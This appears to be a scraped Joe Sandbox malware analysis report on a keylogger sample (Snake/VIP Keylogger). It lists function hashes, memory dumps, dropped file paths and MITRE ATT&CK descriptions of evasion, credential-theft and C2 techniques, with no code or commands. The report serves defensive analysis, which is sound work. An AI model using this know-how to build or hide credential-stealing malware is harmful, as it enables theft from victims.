Instruction Fuzzy Hash: 67F08C32A101189FCB54CF69D808BEEBBF5EBD8320F10C03AEA18D3214D3318A158B90

Function 00EC6739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d1d17ed70ec867ce94bc33aa1a863dd212ad960500b58494dc5e084ef10a3b0
Instruction ID: 050a49ac9a9d176fd9b90c265961d4fae19d44f4a1c40593020b32b540c4eb1b
Opcode Fuzzy Hash: 3d1d17ed70ec867ce94bc33aa1a863dd212ad960500b58494dc5e084ef10a3b0
Instruction Fuzzy Hash: 9CE0C23004C3295FC342AB30AE81DD03FAAAB4221171856A0F4050B46FDF789E858B60

Function 00EC28A2 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a46487ef8a839abd3e41515e281f07be0ce46ce86c5c35d018db75d178850b8
Instruction ID: a13b31512cd09a74929e8a68ceb7f96d80887744bf431f3dc1ea7732c3f4534d
Opcode Fuzzy Hash: 4a46487ef8a839abd3e41515e281f07be0ce46ce86c5c35d018db75d178850b8
Instruction Fuzzy Hash: 30E08676D10226C7C701EBB09C000EEB734AFD1325F54462BC46532180FB31625986E2

Function 00EC28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 315969f6d959512bd9382644613b2f590464546f5788b3659d0be505cc2b8334
Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
Opcode Fuzzy Hash: 315969f6d959512bd9382644613b2f590464546f5788b3659d0be505cc2b8334
Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2

Function 00ECD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6be048acad899ec9f3f667df64f1e7e931d5ba6cc7ceb9f07adf36d79166a0
Instruction ID: 61c7f2137247141ae429a139373264fdac35e0e6aa442e469313762d3d42612a
Opcode Fuzzy Hash: 9c6be048acad899ec9f3f667df64f1e7e931d5ba6cc7ceb9f07adf36d79166a0
Instruction Fuzzy Hash: 04D0E238E44108CBCB30DFA8E4848DCFBB0EF48322B20543AD82AA3200C6301451CF01

Function 00ECAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175384dac6f862d86e3d0872c7fdc6cf88545d8c92e948f44f7a2b5e1e971184
Instruction ID: 6e6e72b1185ff6720c8478823cbef8587b7509fd06cfb6e0c34c89d245c4feba
Opcode Fuzzy Hash: 175384dac6f862d86e3d0872c7fdc6cf88545d8c92e948f44f7a2b5e1e971184
Instruction Fuzzy Hash: DAD0173AB000089FCB048F98E8408DDF7B6FB98220B048026E921A3220C6319821CB50

Function 00EC6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: badeda91701f40fdd35953a51153d49863fc498b5888e63ef563127c453c84a3
Instruction ID: 24b629200040f7736d25173bbea770f23164613cf09ca729398bed5645019dd8
Opcode Fuzzy Hash: badeda91701f40fdd35953a51153d49863fc498b5888e63ef563127c453c84a3
Instruction Fuzzy Hash: E2C0123001432C4FC515F775FE45A55379EAB802067649920B00A0794FDEB45D854794

Non-executed Functions

Function 00ECFA88 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b1ec15c12378be55c08bd011b9ab1d35f27ef9dc76ac17d9ae3fb0df780795d
Instruction ID: 8540c05293fad0a6460d730baca50b7bdc05fb49df6329818c452c5e75bae466
Opcode Fuzzy Hash: 7b1ec15c12378be55c08bd011b9ab1d35f27ef9dc76ac17d9ae3fb0df780795d
Instruction Fuzzy Hash: D8C1A074E10218CFDB14DFA5C994B9DBBB2AF89304F2090A9D809BB355DB359E86CF50

Function 00ECF630 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee557d3a2dacd2b906acb2cb800bb4af68dc01b7cadffaa08a7e249d37829704
Instruction ID: 1de9ca003f9ec714ee9d04181815eb6c4b0a27f7af719e30ca871839e03982fc
Opcode Fuzzy Hash: ee557d3a2dacd2b906acb2cb800bb4af68dc01b7cadffaa08a7e249d37829704
Instruction Fuzzy Hash: C6C1BF78E11218CFDB14DFA5C984B9DBBB2AF89304F2090A9D809BB355DB359E85CF50

Function 00EC2A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

Xbq, xrefs: 00EC2B57
Xbq, xrefs: 00EC2AD8
Xbq, xrefs: 00EC2BA4
Xbq, xrefs: 00EC2A9E

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 3be042b3f95934aab792cbba3308b322b21099251e160eadab19edbe9ef8b287
Instruction ID: a032903784e8286da1cc875628cc8d027ee696a6fb3195df767af17954b0a6f5
Opcode Fuzzy Hash: 3be042b3f95934aab792cbba3308b322b21099251e160eadab19edbe9ef8b287
Instruction Fuzzy Hash: E9318371D003198BDF64CE698A80BAFB7F6AB54304F14547DC509B7381DB328E42CB92

Function 00EC6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 00EC692C
\;^q, xrefs: 00EC695E
\;^q, xrefs: 00EC6952
\;^q, xrefs: 00EC6936

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 4de0d5dba9c261a8da7c7632caf717aa5935a3f436400aa89cc2b0531ea34573
Instruction ID: d86415b34aa4d767967560427637cd06c874e55d1ac3ad883833b0e0a44b55f5
Opcode Fuzzy Hash: 4de0d5dba9c261a8da7c7632caf717aa5935a3f436400aa89cc2b0531ea34573
Instruction Fuzzy Hash: 98019A31B001148FCB648E2CC644F2A73EAABC8B65725556EE84AEB3A0DA32DC428741

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tzoqm1k.hk2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21lqgs3s.2lh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpzdcvwv.4oj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duoksdqd.zn1.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exe

Function 052D1BD0 Relevance: 9.1, Strings: 7, Instructions: 365
COMMON

Function 0128D138 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 07832D9D Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Function 07832DA8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 01284248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 01285917 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 07832B18 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Function 07832B20 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 07832980 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Function 07832C09 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 07835699 Relevance: 1.6, APIs: 1, Instructions: 64
windowCOMMON

Function 07832988 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre